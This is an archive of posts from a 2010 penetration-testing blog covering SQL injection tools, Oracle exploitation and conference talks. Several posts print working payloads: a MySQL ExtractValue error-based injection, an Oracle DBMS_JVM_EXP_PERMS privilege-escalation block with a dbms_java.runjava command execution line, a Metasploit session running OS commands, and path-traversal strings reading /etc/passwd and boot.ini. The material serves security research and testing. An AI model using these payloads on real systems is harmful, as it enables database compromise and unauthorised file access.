www.notsosecure.com

bsqlbf v 2.6

sid — Thu, 01 Jul 2010 10:08:34 +0000

The new version of bsqlbf is now available for download. The new addition is the execution of any metasploit payload after executing OS code against Oracle database server by exploiting SQL Injection from web apps.

Project Homepage

Video

mysql exploitation with error messages

sid — Tue, 29 Jun 2010 11:04:46 +0000

A colleague of mine(Aleks) forwarded me a russian presentation on exploiting SQL Injection:

http://devteev.blogspot.com/2009/10/advanced-sql-injection-lab-full-pack.html

Of all the slides, i particular liked the one in which the author demonstrates that if the mysql error messages have been enabled (using mysql_error() function), then it is possible to retrieve the data from the back-end database using the ExtractValue() function:
——————————————
>SELECT 1 AND ExtractValue(1, CONCAT(0×5c, (SELECT @@VERSION)))

produces:

Error Code : 1105
XPATH syntax error: ‘\5.1.44-community’

———————-
This should not be confused with the php errors. While the php errors are usually enabled its not “very” common to see developers printing the mysql errors using mysql_error() function. However, its still good to know and could sometimes come handy.

Overall, very nice presentation.

Blackhat, Defcon 2010

sid — Fri, 25 Jun 2010 08:16:59 +0000

This year, i will be talking at Blackhat and Defcon. The talk is titled “Hacking Oracle From Web Apps”. The details about the talk can be found here. I am also releasing a small teaser video of the new bsqlbf version which i will be releasing soon. See you in Vegas!

Link to the video

Infosec 2010

sid — Thu, 22 Apr 2010 11:15:14 +0000

Its that time of the year. If you are attending Infosec 2010 in London, it will be a good time to meet up. I will at stand G42. I will also be giving a talk titled:
Latest From the world of Hacking

The talk shows a number of recently released exploits in action. These include:
* Oracle 10g/11g DBMS_JVM_EXP_PERMS exploit
* ie aurora exploit
* KiTrap0D exploit (windows local privilege escalation)
* Java Web Start client side exploit
* Remote Code execution in SMB v2 (MS09-050)
* Linux Kernel 2.x sock_sendpage() Local Ring0 root exploit
* Some PDF exploits
…and many more…

See you there!

bsqlbf v2.5

sid — Tue, 13 Apr 2010 18:32:03 +0000

I have updated bsqlbf and the latest version (2.5), has the following 2 additions:

Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), with DBA Privs (11g R1 and R2)
Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions (10g R2, 11g R1 and R2)

For more details about these 2 attack vectors, please refer to the paper, Hacking Oracle From Web

Bsqlbf Homepage

Enjoy!

Metasploit Oracle Windows

sid — Mon, 15 Mar 2010 17:38:37 +0000

I finally managed to get Oracle and Metasploit working (only in windows though). Here are the steps that i followed (thanks to bugtrace):
[1]Install subversion client
http://www.open.collab.net/files/documents/60/3006/CollabNetSubversion-client-1.6.9-1.win32.exe

[2]install ruby
http://rubyforge.org/frs/download.php/47082/ruby186-27_rc2.exe

[3]install ruby-oci8
wget http://rubyforge.org/frs/download.php/65901/ruby-oci8-1.0.7-mswin32.rb
ruby ruby-oci8-1.0.7-mswin32.rb

[4]
svn co http://metasploit.com/svn/framework3/trunk/ metasploit

cd metasploit
ruby msfconsole

——-
As i was very pleased to see the oracle exploits in action in Metasploit, i have also added 2 new exploits from David Litchfield’s blackhat talk (DBMS_JVM_EXP_PERMS exploit). The exploits let you execute OS Code against 10g R2, 11g R1 and 11g R2 if you have a valid user account (just create session privileged required). Please do a svn update to get the following new files:

modules\auxiliary\sqli\oracle\jvm_os_code_10g.rb
modules\auxiliary\sqli\oracle\jvm_os_code_11g.rb

Here is how it works:

C:\metasploit>svn update

A modules\auxiliary\sqli\oracle\jvm_os_code_10g.rb
A modules\auxiliary\sqli\oracle\jvm_os_code_11g.rb
U modules\auxiliary\scanner\nfs\nfsmount.rb
A modules\auxiliary\scanner\smb\smb_enumshares.rb
U modules\auxiliary\gather\dns_enum.rb
U modules\exploits\unix\webapp\phpbb_highlight.rb
U data\wordlists\namelist.txt
A data\sql\migrate\014_add_loots_fields.rb

msf auxiliary(jvm_os_code_10g) > use auxiliary/sqli/oracle/jvm_os_code_10g
msf auxiliary(jvm_os_code_10g) > info

Name: DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution
Version: 8822
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
sid

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
CMD echo metasploit >> %SYSTEMDRIVE%\\unbreakable.txt no CMD to execute.
DBPASS test yes The password to authenticate with.
DBUSER test yes The username to authenticate with.
RHOST 192.168.2.11 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID ORCLX yes The sid to authenticate with.

Description:
This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package
that allows any user with create session privilege to grant
themselves java IO privileges. Identified by David Litchfield. Works
on 10g R2, 11g R1 and R2 (Windows only)

References:
http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield
http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/

msf auxiliary(jvm_os_code_10g) > set RHOST 192.168.2.11
RHOST => 192.168.2.11
msf auxiliary(jvm_os_code_10g) > set RPORT 1521
RPORT => 1521
msf auxiliary(jvm_os_code_10g) > set DBUSER test
DBUSER => test
msf auxiliary(jvm_os_code_10g) > set DBPASS test
DBPASS => test
msf auxiliary(jvm_os_code_10g) > set SID ORCLX
SID => ORCLX
msf auxiliary(jvm_os_code_10g) > run

[*] Attempting to grant JAVA IO Privileges
[*] Attempting to execute OS Code
[*] Auxiliary module execution completed
msf auxiliary(jvm_os_code_10g) >

Enjoy!

Hacking Oracle 11g

sid — Thu, 04 Feb 2010 20:37:40 +0000

David Litchfield’s slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:

Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,'java.io.FilePermission’,’<>‘,’execute’,'ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (http://milw0rm.com/exploits/2837).

However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

Here is the link of the talk video:
https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov

Local File Inclusion with Magic_quotes_gpc enabled

sid — Tue, 02 Feb 2010 09:29:29 +0000

So, lets look at a piece of code:

Normally, you would use the null byte (%00) to exploit it:

vuln.php?page=../../../../../etc/passwd%00

but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.

How to bypass this: it you add a large number of dots (…..) than the ~~null byte will not get escaped~~ null byte is not required. e.g.

vuln.php?~~page=../../../../../etc/passwd%00……………………………………………………………………..(200 dots in this case)~~

vuln.php?page=../../../../../etc/passwd……………………………………………………………………..(200 dots in this case)

Correction: You don’t need null byte here.

Update: As pointed out by Bodgan, this only works for windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link

tested on php version: 5.2.12 (wamp environment)

References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar

Open Redirection

sid — Fri, 22 Jan 2010 15:13:07 +0000

So, recently i encountered an application which was really secure against XSS.

image link
How many issues can one parameter suffer from:

1. Open redirection
2. Session ID in the URL
3. Session Hijacking by combining 1 and 2

Oh but, really safe against XSS!

Twitter

sid — Wed, 30 Dec 2009 11:46:36 +0000

I have finally decided to give twitter a go.
Follow me at:
https://twitter.com/notsosecure